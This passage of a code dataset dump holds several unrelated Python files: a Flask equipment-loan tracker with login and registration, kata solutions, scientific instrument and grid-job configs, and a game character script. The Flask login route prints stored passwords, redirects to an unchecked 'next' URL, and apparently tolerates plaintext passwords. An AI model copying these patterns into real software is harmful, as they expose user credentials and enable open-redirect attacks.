connection)\r\n pass\r\n\r\n get_debtor_details(debtor, connection)\r\n\r\n # get our premises for the debtor\r\n get_premises(debtor, connection)\r\n\r\n # get our invoices for the debtor\r\n get_last_invoice(debtor, connection)\r\n\r\n get_last_payment(debtor, connection)\r\n\r\n # and PTJs, maybe???\r\n #get_recent_ptjs(debtor, connection)\r\n\r\n close_database_connection(connection)\r\n\r\n return debtor\r\n","sub_path":"ninetypercent/details/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"351193149","text":"from __future__ import print_function # In python 2.7\nfrom flask import render_template, flash, redirect, session, url_for, request, g\nfrom urlparse import urlparse, urljoin\nimport smtplib, re\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\nimport sys\nfrom sqlalchemy import cast\nfrom sqlalchemy.sql.expression import cast\nfrom sqlalchemy import Column, Integer, Sequence, types, Float, String\n\nimport sqlalchemy\nfrom datetime import date, datetime, time, timedelta\nimport pytz\nfrom flask.ext.mail import Message\nfrom pytz import timezone\nimport time\nfrom flask_login import login_user, logout_user, current_user, login_required\nfrom datetime import datetime\nfrom app import app, db, lm, admin, BaseView, expose, ModelView, bcrypt, mail, SQLAlchemy\nfrom .forms import searchForm, newEntryForm, item_choices, day_choices, search_choices, loginForm, registrationForm\nfrom .models import Entry, User, Log, adminEmails\nfrom itsdangerous import URLSafeTimedSerializer\n\nclass MyView(BaseView):\n @expose('/')\n def index(self):\n \n return self.render('AdminIndex.html')\n \nadmin.add_view(MyView(name='Welcome'))\nadmin.add_view(ModelView(User, db.session))\nadmin.add_view(ModelView(Entry, db.session))\nadmin.add_view(ModelView(adminEmails, db.session))\n\nsydney = timezone('Australia/Sydney')\nau_time = datetime.now(sydney)\n\ncurrDate = au_time.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n#print (\"dd/mm/yyyy format = %s/%s/%s\" % (dueDate.day, dueDate.month, dueDate.year), file=sys.stderr )\n\nallEmails = adminEmails.query.all()\nif allEmails:\n adminEmail = allEmails[0].adminEmail\n notifEmail = allEmails[0].notifEmail\n\n print(adminEmail, notifEmail)\ndef lower(string):\n return string.lower()\n\ndef update_loans():\n entries = Entry.query.all()\n if entries:\n au_time = datetime.now(sydney)\n currDate = au_time.strftime(\"%d/%m/%Y %H:%M:%S\")\n d1 = datetime.strptime(currDate, '%d/%m/%Y %H:%M:%S')\n d1 = d1.date()\n for entry in entries:\n\n if (entry.dueDate != None):\n dueDate = (entry.dueDate)\n dueDate = dueDate.strftime('%d/%m/%Y %H:%M:%S')\n \n #currDate = time.strftime(dueDate, \"%d/%m/%Y\")\n print (d1, dueDate, file=sys.stderr)\n d2 = datetime.strptime(dueDate, '%d/%m/%Y %H:%M:%S')\n d2 = d2.date()\n \n print(d1,d2)\n daysRemaining = ((d2 - d1).days)\n print (\"Testing\",file=sys.stderr)\n print(entry.days_remaining, daysRemaining, file=sys.stderr)\n print(entry.first_name, file=sys.stderr)\n\n if daysRemaining >= 0: \n entry.days_remaining = int(daysRemaining)\n else:\n daysRemaining = 0\n entry.days_remaining = int(daysRemaining)\n\n #if entry.days_remaining == 0:\n\n db.session.commit()\n sendEmailEntry()\n\ndef is_safe_url(target):\n ref_url = urlparse(request.host_url)\n test_url = urlparse(urljoin(request.host_url, target))\n return test_url.scheme in ('http', 'https') and \\\n ref_url.netloc == 
test_url.netloc\n\n@app.before_request\ndef before_request():\n if current_user.is_authenticated:\n g.user = None # return username in get_id()\n print(\"its authentic\")\n else:\n g.user = current_user\n print(\"its something\")\n \n #if current_user.id:\n # print(\"found an id\")\n\n@lm.user_loader\ndef user_loader(id):\n print (\"the id is:\")\n print (id, file=sys.stderr)\n user = User.query.get(id)\n if user:\n print (\"User found for\")\n print(user.id, file=sys.stderr)\n return User.query.get(int(id))\n else:\n print (\"We got here instead\")\n return None\n\n@app.context_processor\ndef inject_user():\n if current_user.is_authenticated:\n return dict(user=user_loader(current_user.id))\n else:\n user = \"hello\"\n return dict(user=current_user)\n \n@app.route(\"/\", methods=['GET', 'POST'])\n@login_required\ndef main():\n #user = user_loader(current_user.id)\n if current_user.is_authenticated:\n g.user = user_loader(current_user.id)\n print (\"the user is:\")\n print (g.user.id, file=sys.stderr)\n if request.method == 'POST':\n if request.form['btn'] == 'Submit':\n au_time = datetime.now(sydney)\n\n currDate = au_time.strftime(\"%d/%m/%Y %H:%M:%S\")\n form = newEntryForm(request.form)\n #flash('Record was successfully added')\n print(form.firstName, file=sys.stderr)\n integer = int(form.item.data)\n item_display = item_choices[integer][1]\n print(\"Hello there\")\n day_integer = int(form.duration.data) \n print(\"the day integer is:\", day_integer)\n day_display = day_integer #need to fix this\n print(\"the day display is:\", day_display)\n\n currrDate = datetime.strptime(currDate, '%d/%m/%Y %H:%M:%S')\n due_date = datetime.strptime(currDate, '%d/%m/%Y %H:%M:%S') + timedelta(days=day_integer)\n\n #if form.validate():\n print(day_display, file=sys.stderr)\n print(\"hello there\", file=sys.stderr)\n print(\"the date is:\", day_integer, due_date, file=sys.stderr)\n\n if (item_display == \"Other\"):\n entry = Entry(first_name=form.firstName.data, last_name=form.lastName.data, quantity=form.quantity.data, item = form.body.data, asset = form.asset.data, duration = day_display, dueDate = due_date, \n days_remaining = day_display, create_date = currrDate, status=\"On Loan\", tech=g.user.username,notes = form.notes.data)\n else:\n entry = Entry(first_name=form.firstName.data, last_name=form.lastName.data, quantity=form.quantity.data, item = item_display,asset = form.asset.data, duration = day_display, dueDate = due_date, \n days_remaining = day_display, create_date = currrDate, status=\"On Loan\", tech=g.user.username, notes = form.notes.data)\n\n db.session.add(entry)\n db.session.commit()\n\n flash('Record was successfully added')\n\n return redirect(url_for('main')) # else:\n #return render_template('index.html', form = form)\n else:\n return render_template('viewEntry.html', user = g.user, entries = Entry.query.all())\n else:\n #Calculate the days remaining\n #update_loans()\n \n \n return render_template('index.html', user = g.user, form = newEntryForm(), entries = Entry.query.all())\n\ndef generate_confirmation_token(email):\n serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])\n return serializer.dumps(email, salt=app.config['SECURITY_PASSWORD_SALT'])\n\ndef confirm_token(token, expiration=3600):\n serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])\n try:\n email = serializer.loads(\n token,\n salt=app.config['SECURITY_PASSWORD_SALT'],\n max_age=expiration\n )\n except:\n return False\n return email\n\ndef sendEmailConfirm(to, subject, template):\n msg = Message(\n 
subject,\n recipients=[to],\n html=template,\n sender=(\"List3r\", app.config['MAIL_DEFAULT_SENDER'])\n )\n mail.send(msg)\n \ndef sendEmailEntry():\n \n results = Entry.query.filter(cast(Entry.days_remaining, sqlalchemy.String).ilike(\"%\"+ \"0\" +\"%\"), Entry.status.ilike(\"%\"+ \"On Loan\" +\"%\")).all()\n if results:\n subject = \"Service Desk Loans Due\"\n \n msg = Message(\n subject,\n recipients=[notifEmail],\n html = render_template('loanDue.html', entries=results),\n sender=(\"List3r\", app.config['MAIL_DEFAULT_SENDER'])\n )\n mail.send(msg)\n\n print(\"email has been sent\")\n flash(\"update email sent\")\n else: \n print(\"theres no loans due\")\n\n\n@app.route('/delete', methods=['POST'])\ndef delete_entry():\n g.user = user_loader(current_user.id)\n\n if request.method == 'POST':\n entry = Entry.query.get(request.form['entry_to_delete'])\n entry.status = \"Returned\"\n date = datetime.strptime(currDate, '%d/%m/%Y %H:%M:%S')\n date = date.strftime('%d/%m/%Y')\n entry.date_returned = str(date) + \", \" + str(g.user.username)\n entry.days_remaining = 0\n print(\"we are printing\", file=sys.stderr)\n print(entry.first_name, file=sys.stderr)\n #log = Log(first_name=entry.first_name, last_name=entry.last_name, item = entry.item, action = \"Deleted\", tech = entry.tech, date = datetime.strptime(currDate, '%d/%m/%Y')) \n #db.session.add(log)\n #Entry.query.filter_by(id=request.form['entry_to_delete']).delete()\n db.session.commit()\n \n return redirect(url_for('main'))\n\n@app.route('/Entry/', methods=['GET', 'POST'])\n@login_required\ndef view_entry(entry_id):\n print(\"the page is\")\n print (request.referrer, file=sys.stderr)\n print (request.endpoint, file=sys.stderr)\n fetched_entry=Entry.query.filter_by(id=entry_id).first()\n print(fetched_entry.first_name, file=sys.stderr)\n return render_template('viewEntry.html', entry=fetched_entry, prevPage = request.referrer)\n\n@app.route('/Search/', methods=['GET', 'POST'])\n@login_required\ndef search_entry():\n if request.method == 'POST':\n form1 = searchForm(request.form)\n \n integer = int(form1.category.data)\n search_cat = search_choices[integer][1]\n \n print(\"GOING IN\", file=sys.stderr)\n print(form1.searchField.data, file=sys.stderr)\n if search_cat == \"iD\":\n results = Entry.query.filter_by(id=form1.searchField.data).all()\n elif search_cat == \"Client\":\n results = Entry.query.filter((Entry.first_name.ilike(\"%\"+ form1.searchField.data +\"%\")) | (Entry.last_name.ilike(\"%\"+ form1.searchField.data +\"%\")) ).all()\n elif search_cat == \"Item\":\n results = Entry.query.filter(Entry.item.ilike(\"%\"+ form1.searchField.data +\"%\")).all()\n elif search_cat == \"Asset\":\n results = Entry.query.filter(Entry.asset.ilike(\"%\"+ form1.searchField.data +\"%\")).all()\n elif search_cat == \"Tech\":\n results = Entry.query.filter(Entry.tech.ilike(\"%\"+ form1.searchField.data +\"%\")).all()\n elif search_cat == \"Days Remaining\":\n results = Entry.query.filter(cast(Entry.days_remaining, sqlalchemy.String).ilike(\"%\"+ form1.searchField.data +\"%\")).all()\n else:\n results = []\n \n return render_template('searchEntry.html', form = searchForm(), results = results)\n else:\n return render_template('searchEntry.html', form = searchForm())\n\nif __name__ == \"__main__\":\n app.run()\n \n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"For GET requests, display the login form. 
For POSTS, login the current user\n by processing the form.\"\"\"\n #print dbprint(\"Username is:\")\n\n form = loginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data.lower()).first()\n \n print(\"Username is:\")\n print(user.username)\n print(\"password is:\")\n print(user.password)\n if len(user.password) < 25:\n user.set_password(user.password)\n \n if user:\n if bcrypt.check_password_hash(user.password, form.password.data) and user.authenticated == True:\n #user.authenticated = True\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=False)\n flash('Logged in successfully.')\n next = request.args.get('next')\n # is_safe_url should check if the url is safe for redirects.\n # See http://flask.pocoo.org/snippets/62/ for an example.\n #if not is_safe_url(next):\n print (\"got ere\")\n\n return redirect(next or url_for('main'))\n # return redirect(\"/\")\n next = request.args.get('next')\n print (\"got hereeee\")\n return render_template(\"login.html\", form=form, next=next)\n\n@app.route(\"/history\", methods=[\"GET\"])\ndef history():\n return redirect(url_for('main'))\n #return render_template(\"history.html\", logs = Log.query.all())\n \n@app.route(\"/about\", methods=[\"GET\"])\ndef about():\n return render_template(\"about.html\")\n\n@app.route(\"/verifyMessage\", methods=[\"GET\"])\ndef verifyMessage():\n \"\"\"Message asking them to check their emails\"\"\"\n return render_template(\"checkEmail.html\")\n\n@app.route(\"/confirmed\", methods=[\"GET\"])\ndef confirmed():\n \"\"\"account confirmed\"\"\"\n return render_template(\"activated.html\")\n\ndef hasNumbers(inputString):\n return any(char.isdigit() for char in inputString)\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n form = registrationForm()\n \"\"\"\n user = User(\n email=form.email.data,\n password=form.password.data,\n confirmed=False\n )\n\n \"\"\"\n \n if request.method == \"POST\" and form.validate():\n #must be knox email address\n usernameF = form.username.data\n usernameF = usernameF.lower()\n emailF = form.email.data\n passwordF = form.password.data\n passwordF = bcrypt.generate_password_hash(passwordF).decode('utf-8')\n domain = re.search(r'@\\w+(.*)', emailF).group()\n print(\"the domain is:\", domain)\n\n #check if user exists\n checkUsername = User.query.filter_by(username=usernameF)\n checkEmail = User.query.filter_by(email=emailF)\n if checkUsername.count() > 0 or checkEmail.count() > 0 or hasNumbers(emailF) or domain != \"@knox.nsw.edu.au\":\n if checkUsername.count() > 0:\n flash(\"That username is already taken, please choose another\")\n return render_template('signup.html', form=form, message=\"Username taken\")\n elif checkEmail.count() > 0:\n flash(\"That email is already taken, please choose another\")\n return render_template('signup.html', form=form, message=\"Email taken\")\n else:\n flash(\"Use knox email address\")\n return render_template('signup.html', form=form, message=\"Please use Knox email\")\n else:\n #enter user into database\n user = User(username=usernameF, password = passwordF, email = emailF, authenticated = False, confirmed = False)\n token = generate_confirmation_token(user.email)\n\n flash(\"Thanks for registering!\")\n \n confirm_url = url_for('confirm_email', token=token, _external=True)\n html = render_template('activate.html', confirm_url=confirm_url)\n subject = \"Please confirm your email\"\n \n sendEmailConfirm(emailF, subject, html)\n \n db.session.add(user)\n 
db.session.commit()\n return redirect(url_for('verifyMessage'))\n else:\n flash(\"didnt specify validation\")\n \n return render_template(\"signup.html\", form=form)\n \n \n@app.route(\"/logout\", methods=[\"GET\"])\ndef logout():\n \"\"\"Logout the current user.\"\"\"\n print(\"user logged out eyyy\")\n #user = current_user\n #user.authenticated = False\n #db.session.add(user)\n #db.session.commit()\n logout_user()\n return redirect(url_for('main')) \n\n\n@app.route(\"/confirm/\", methods=[\"GET\"])\ndef confirm_email(token):\n try:\n email = confirm_token(token)\n except:\n flash('The confirmation link is invalid or has expired.', 'danger')\n user = User.query.filter_by(email=email).first_or_404()\n if user.confirmed:\n flash('Account already confirmed. Please login.', 'success')\n else:\n user.confirmed = True\n user.authenticated = True\n user.confirmed_on = au_time \n db.session.add(user)\n db.session.commit()\n flash('You have confirmed your account. Thanks!', 'success')\n \n return redirect(url_for('confirmed'))","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"596180294","text":"# Converting a normal (12-hour) time like \"8:30 am\" or \"8:30 pm\" to 24-hour time\n# (like \"0830\" or \"2030\") sounds easy enough, right? Well, let's see if you can do it!\n#\n# You will have to define a function named \"to24hourtime\", and you will be given an hour\n# (always in the range of 1 to 12, inclusive), a minute (always in the range of 0 to 59, inclusive),\n# and a period (either \"am\" or \"pm\") as input.\n#\n# Your task is to return a four-digit string that encodes that time in 24-hour time.\n\n\ndef to24hourtime(hour, minute, period):\n if hour < 12:\n hour = hour if period == 'am' else hour + 12\n return str(hour).rjust(2,\"0\") + str(minute).rjust(2,\"0\")\n\n\nprint(to24hourtime(1, 2, \"am\"))\n\n# Clever oneliner\n\n# def to24hourtime(hour, minute, period):\n# return '%02d%02d' % (hour % 12 + 12 * (period == 'pm'), minute)\n","sub_path":"Datetime/converting_12_to_24_hour.py","file_name":"converting_12_to_24_hour.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"547637803","text":"#Is my friend cheating?\n\ndef removNb(n):\n ### TIMED OUT! 
###\n #l=[]\n #gauss = n*(n+1)/2\n #for i in range(1,n+1):\n #for j in range(1,n+1):\n #if int(((i*j)+i+j))==int(gauss):\n #l.append(tuple((i,j)))\n #return l\n l=[]\n gauss = n*(n+1)/2\n for i in range(1,n+1):\n j = (gauss - i)/(i+1)\n if j<=n and j.is_integer():\n l.append((i, int(j)))\n return l\n\n#Maximum subarray sum\n\ndef maxSequence(arr):\n max_ending_here = max_so_far = 0\n for x in arr:\n max_ending_here = max(x, max_ending_here + x)\n max_so_far = max(max_so_far, max_ending_here)\n return max_so_far\n\n#Perimeter of squares in a rectangle\n\ndef perimeter(n):\n a=1\n b=1\n l=[a,b]\n if n<0:\n print(\"Incorrect input\")\n elif n == 0:\n return a\n elif n == 1:\n return b\n else:\n for i in range(2,n+1):\n c=a+b\n l.append(c)\n a=b\n b=c\n return 4*sum(l)\n\n#Rot13\n\nimport string\nfrom codecs import encode as _dont_use_this_\n\ndef rot13(message):\n alphabet = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n rot13alphabet = \"nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM\"\n rot13 = string.maketrans(alphabet,rot13alphabet)\n return string.translate(message,rot13)\n\n","sub_path":"5Kyu_Katas.py","file_name":"5Kyu_Katas.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"477196107","text":"def is_prime(p, old_primes):\n \"\"\"Return True if 'p' is prime.\n\n 'old_primes' is list of primes so far.\n \"\"\"\n\n if old_primes[p]: # already found prime?\n return True\n\n if (p % 2) == 0: # check 2 divisor first\n return False\n\n # now check if any older primes can divide evenly\n for i in range(3, int(p**0.5)+1, 2):\n if (p % i) == 0:\n return False\n\n # 'p' is prime, remember in 'old_primes' and return True\n old_primes[p] = True\n return True\n\ndef step(g, m, n):\n \"\"\"Find two primes p and p' in [m, n] such that p' = p + g.\n\n Return result pair [p, p'] where p < p'.\n Return None if no step pair found in [m, n].\n \"\"\"\n\n # list of which integers are primes\n primes = [False] * (n+1)\n\n # scan upwards from 'm' looking for primes\n if (m % 2) == 0: # if 'm' is even, move up to next odd\n m += 1\n for x in range(m, n-g+1, 2):\n if is_prime(x, primes) and is_prime(x+g, primes):\n return [x, x+g]\n","sub_path":"reddit_replies/code_wars_prime_step/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"557326593","text":"#! 
/usr/bin/env python3\nnewline = False\n\n\ndef read_problem():\n return tuple(int(c) for c in input().split())\n\n\ndef solve(problem):\n B, M = problem\n if M > 2 ** (B - 2):\n return None\n if M == 2 ** (B - 2):\n first = '0' + '1' * (B - 1)\n else:\n first = bin(M)[2:]\n fmt = \"{0:0\" + str(B - 1) + \"b}\"\n first = fmt.format(M) + '0'\n return [first] + ['0' * i + '1' * (B - i) for i in range(2, B + 1)]\n\n\ndef print_solution(slides):\n if slides is None:\n print(\"IMPOSSIBLE\")\n else:\n print(\"POSSIBLE\")\n print(*slides, sep='\\n')\n\n\ncases = int(input())\nfor n in range(1, cases + 1):\n problem = read_problem()\n solution = solve(problem)\n print(\"Case #{0}:\".format(n), end='\\n' if newline else ' ')\n print_solution(solution)\n","sub_path":"solutions_5744014401732608_1/Python/314eter/slides.py","file_name":"slides.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"63542201","text":"import json\nfrom graph import Graph\nfrom game_components.train import Train\nfrom game_components.game_points import *\n\n\ndef read_graph_from_json(filename):\n with open(filename) as json_data:\n graph = json.load(json_data)\n return graph\n\n\ndef dict_to_graph(layer0):\n graph = Graph(idx=layer0['idx'], name=layer0['name'])\n for point in layer0['points']:\n graph.add_vertex(idx=point['idx'], post_idx=point['post_idx'])\n for line in layer0['lines']:\n graph.add_edge(idx=line['idx'], length=line['length'], vert_from=line['points'][0], vert_to=line['points'][1])\n return graph\n\n\ndef dict_to_trains(layer1):\n trains = {}\n for train in layer1['trains']:\n trains[train['idx']] = dict_to_train(train)\n return trains\n\n\ndef dict_to_train(dictionary):\n return Train(idx=dictionary['idx'], speed=dictionary['speed'], line_idx=dictionary['line_idx'],\n position=dictionary['position'], player_idx=dictionary['player_idx'])\n\n\ndef dict_to_posts(layer1):\n posts = layer1['posts']\n result = {}\n for post in posts:\n if post['type'] == 1:\n result[post['idx']] = dict_to_town(post)\n elif post['type'] == 2:\n result[post['idx']] = dict_to_market(post)\n elif post['type'] == 3:\n result[post['idx']] = dict_to_storage(post)\n return result\n\n\ndef dict_to_town(dictionary):\n return Town(idx=dictionary['idx'], point_idx=dictionary['point_idx'], name=dictionary['name'], population=dictionary['population'], population_capacity=['population_capacity'],\n armor=dictionary['armor'], armor_capacity=dictionary['armor_capacity'], product=dictionary['product'],\n product_capacity=dictionary['product_capacity'])\n\n\ndef dict_to_market(dictionary):\n return Market(idx=dictionary['idx'], point_idx=dictionary['point_idx'], name=dictionary['name'],\n product=dictionary['product'], product_capacity=dictionary['product_capacity'], replenishment=dictionary['replenishment'])\n\n\ndef dict_to_storage(dictionary):\n return Storage(idx=dictionary['idx'], point_idx=dictionary['point_idx'], name=dictionary['name'],\n replenishment=dictionary['replenishment'], armor=dictionary['armor'], armor_capacity=dictionary['armor_capacity'])\n","sub_path":"json_converter.py","file_name":"json_converter.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"226654701","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"\nProvides Instrument class for simulations of DESI observations\n\"\"\"\nfrom __future__ import 
print_function, division\n\n\nimport os.path\nimport glob\nimport yaml\nimport numpy as np\nfrom astropy.io import fits\nimport scipy.interpolate\n\nimport specsim.spectrum\n\n\nclass Instrument(object):\n \"\"\"\n A class representing the DESI instrument for simulating observations\n \"\"\"\n def __init__(self,modelFilename=None,throughputPath=None,psfFile=None,basePath=''):\n \"\"\"\n Initializes an Instrument using parameters in the specified yaml model file,\n throughputs in the specified path, and psf parameters in the specified\n FITS file. If any filename or path is None, use a default relative to basePath.\n \"\"\"\n # Apply defaults if necessary.\n if modelFilename is None:\n modelFilename = os.path.join(basePath,'data','desi.yaml')\n if throughputPath is None:\n throughputPath = os.path.join(basePath,'data','throughput')\n if psfFile is None:\n psfFile = os.path.join(basePath,'data','specpsf','psf-quicksim.fits')\n # Load the model parameters from the specified YAML file.\n if not os.path.isfile(modelFilename):\n raise RuntimeError('No such yaml model file: %s' % modelFilename)\n with open(modelFilename) as stream:\n self.model = yaml.safe_load(stream)\n # Load the throughputs for each camera from the specified path.\n if not os.path.isdir(throughputPath):\n raise RuntimeError('No such throughput path: %s' % throughputPath)\n # Loop over cameras listed in the model.\n self.throughput = { }\n for camera in self.model['ccd']:\n # Try to open the throughput FITS file for this camera.\n hduList = fits.open(os.path.join(throughputPath,'thru-%s.fits' % camera))\n # Create linear interpolations of the wavelength and throughput columns\n # from the FITS table stored as HDU[1]. Values outside of the tabulated\n # wavelength range will silently extrapolate to zero.\n table = hduList[1].data\n self.throughput[camera] = specsim.spectrum.WavelengthFunction(\n table['wavelength'],table['throughput'], extrapolatedValue=0.)\n hduList.close()\n # Loop over fiberloss models present in the throughput directory.\n self.fiberloss = { }\n for fiberlossFile in glob.iglob(os.path.join(throughputPath,'fiberloss-*.dat')):\n # Extract the model name from the filename.\n model = os.path.basename(fiberlossFile)[10:-4]\n # Load the data from this file.\n self.fiberloss[model] = specsim.spectrum.WavelengthFunction.loadFromTextFile(\n fiberlossFile,extrapolatedValue=0.)\n # Open the PSF parameter file.\n hduList = fits.open(psfFile)\n # Loop over camera bands to build linear interpolations of the PSF FWHM in the\n # wavelength (Angstroms) and spatial (pixels) directions. 
We also build an\n # interpolation of the angstromsPerRow values needed to convert between pixels\n # and Angstroms in the wavelength direction.\n self.angstromsPerRow = { }\n self.psfFWHMWavelength = { }\n self.psfFWHMSpatial = { }\n self.psfNPixelsSpatial = { }\n self.cameraBands = self.model['ccd'].keys()\n self.cameraWavelengthRanges = [ ]\n cameraMidpt = [ ]\n for band in self.cameraBands:\n # Use a key of the form QUICKSIM-X where X identifies the camera band.\n # Note that FITS does not recognize unicode strings as keys so we must\n # explicity encode in 'ascii' here (or not import unicode_literals above).\n key = ('QUICKSIM-%s' % band.upper()).encode('ascii')\n table = hduList[key].data\n wave = table['wavelength']\n # Load tabulated PSF functions of wavelength.\n self.angstromsPerRow[band] = specsim.spectrum.WavelengthFunction(\n wave,table['angstroms_per_row'],extrapolatedValue=0.)\n self.psfFWHMWavelength[band] = specsim.spectrum.WavelengthFunction(\n wave,table['fwhm_wave'],extrapolatedValue=0.)\n self.psfFWHMSpatial[band] = specsim.spectrum.WavelengthFunction(\n wave,table['fwhm_wave'],extrapolatedValue=0.)\n self.psfNPixelsSpatial[band] = specsim.spectrum.WavelengthFunction(\n wave,table['neff_spatial'],extrapolatedValue=0.)\n # Get the wavelength limits for the camera from the FITS header.\n waveMin,waveMax = hduList[key].header['WMIN_ALL'],hduList[key].header['WMAX_ALL']\n assert waveMin == wave[0] and waveMax == wave[-1], (\n \"Inconsistent wavelength limits for %s\" % key)\n self.cameraWavelengthRanges.append((waveMin,waveMax))\n cameraMidpt.append(0.5*(waveMin+waveMax))\n hduList.close()\n # Sort the camera bands in order of increasing wavelength (blue to red). This info\n # is already encoded in the order in which the cameras appear in the YAML file, but\n # is not preserved a YAML parser, which views the 'ccd' record as a dictionary.\n self.cameraBands = [x for (y,x) in sorted(zip(cameraMidpt,self.cameraBands))]\n self.cameraWavelengthRanges = [x for (y,x) in sorted(zip(cameraMidpt,self.cameraWavelengthRanges))]\n\n def getSourceTypes(self):\n \"\"\"\n Returns a list of the source types for which we have a fiber loss model defined.\n \"\"\"\n return self.fiberloss.keys()\n\n def getCameraBands(self):\n \"\"\"\n Returns a list of the camera bands supported by this instrument, in order of\n increasing wavelength.\n \"\"\"\n return self.cameraBands\n","sub_path":"specsim/instrument.py","file_name":"instrument.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"94463876","text":"from msd_mapper import MSDMapper\nmapper=MSDMapper()\ntags={}\nfor line in open('mte5-udv2.mapping'):\n line=line.strip().split('\\t')\n upos='UposTag='+line[1]+'|'+line[3]\n if upos not in tags:\n tags[upos]=set()\n tags[upos].add(line[0])\n#print(tags)\n#sys.exit()\nf=open('hr500k.conll.uposxpos.txt','w')\nfor line in open('hr500k.conll'):\n if line.startswith('#') or line.startswith('\\n'):\n f.write(line)\n continue\n els=line.strip().split('\\t')\n upos=mapper.map_word(els[1], els[2], els[4])\n upos='UposTag='+upos[1]+'|'+upos[2]\n #print(upos,els[8])\n if els[8]==upos:\n f.write(line)\n continue\n if els[8] not in tags:\n print('UPOS',els[4],els[8])\n f.write('UPOS!!!\\t'+line)\n else:\n if els[4] not in tags[els[8]]:\n print('XPOS',els[4],els[8])\n f.write('XPOS!!!\\t'+line)\n else:\n print('LAST RESORT')\n 
f.write(line)\nf.close()","sub_path":"identify_upos_feats_mismatchs.py","file_name":"identify_upos_feats_mismatchs.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"177054277","text":"from WMCore.Configuration import Configuration\nconfig = Configuration()\n\nconfig.section_(\"User\")\nconfig.User.voGroup = 'dcms'\n\nconfig.section_(\"General\")\nconfig.General.requestName = 'JetData-RunB2017-v1'\nconfig.General.workArea = 'JetData-RunB2017-v1'\n\nconfig.section_(\"JobType\")\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = 'flatData-nanoNtuple-cfg.py'\nconfig.JobType.allowUndistributedCMSSW = True\n\nconfig.section_(\"Data\")\nconfig.Data.inputDataset = '/JetHT/Run2017B-31Mar2018-v1/MINIAOD'\nconfig.Data.splitting = 'LumiBased'\nconfig.Data.unitsPerJob = 100\nconfig.Data.lumiMask = 'Cert_294927-306462_13TeV_PromptReco_Collisions17_JSON.txt'\nconfig.Data.runRange = '294927-306462'\nconfig.Data.outputDatasetTag = 'CRAB3_JetData-RunB2017'\n\nconfig.section_(\"Site\")\nconfig.Site.storageSite = \"T2_DE_DESY\"\n","sub_path":"SMPJ/NTuplizer/test/crabMiniAODRunB.py","file_name":"crabMiniAODRunB.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"545126059","text":"###############################################################################\n#\tFilename:\tSaffi.py\n#\t\n#\tConfidential and Proprietary, Copyright 2000 by Totally Games\n#\t\n#\tLoads Saffi Larsen, XO, and configures animations.\n#\t\n#\tCreated:\t3/28/00 -\tErik Novales\n###############################################################################\n\nimport App\nimport CharacterPaths\n\n#NonSerializedObjects = ( \"debug\", )\n\n#debug = App.CPyDebug(__name__).Print\n\n###############################################################################\n#\tCreateCharacter()\n#\n#\tCreate Saffi by building her character and placing her on the passed in set.\n#\tCreate her menus as well.\n#\n#\tArgs:\tpSet\t- the Set in which to place ourselves\n#\n#\tReturn:\tnone\n###############################################################################\ndef CreateCharacter(pSet):\n#\tdebug(\"Creating Saffi\")\n\n\tif (pSet.GetObject(\"XO\") != None):\n\t\treturn(App.CharacterClass_Cast(pSet.GetObject(\"XO\")))\n\tCharacterPaths.UpdatePaths()\n\t# Create the character\n\tApp.g_kModelManager.LoadModel(CharacterPaths.g_pcBodyNIFPath + \"BodyFemM/BodyFemM.nif\", \"Bip01\")\n\tApp.g_kModelManager.LoadModel(CharacterPaths.g_pcBodyTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.nif\", None)\n\tpSCPSaffi = App.CharacterClass_Create(CharacterPaths.g_pcBodyNIFPath + \"BodyFemM/BodyFemM.nif\", CharacterPaths.g_pcHeadNIFPath + \"../BridgeCrew/borgqueen/borgqueen_head.nif\", 1)\n\tpSCPSaffi.ReplaceBodyAndHead(CharacterPaths.g_pcBodyTexPath + \"../BridgeCrew/borgqueen/borgqueen_body.tga\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\n\tpSCPSaffi.SetCharacterName(\"Saffi\")\n\n\t# Add the character to the set\n\tpSet.AddObjectToSet(pSCPSaffi, \"XO\")\n\tpLight = pSet.GetLight(\"ambientlight1\")\n\tpLight.AddIlluminatedObject(pSCPSaffi)\n\n\t# Setup the character 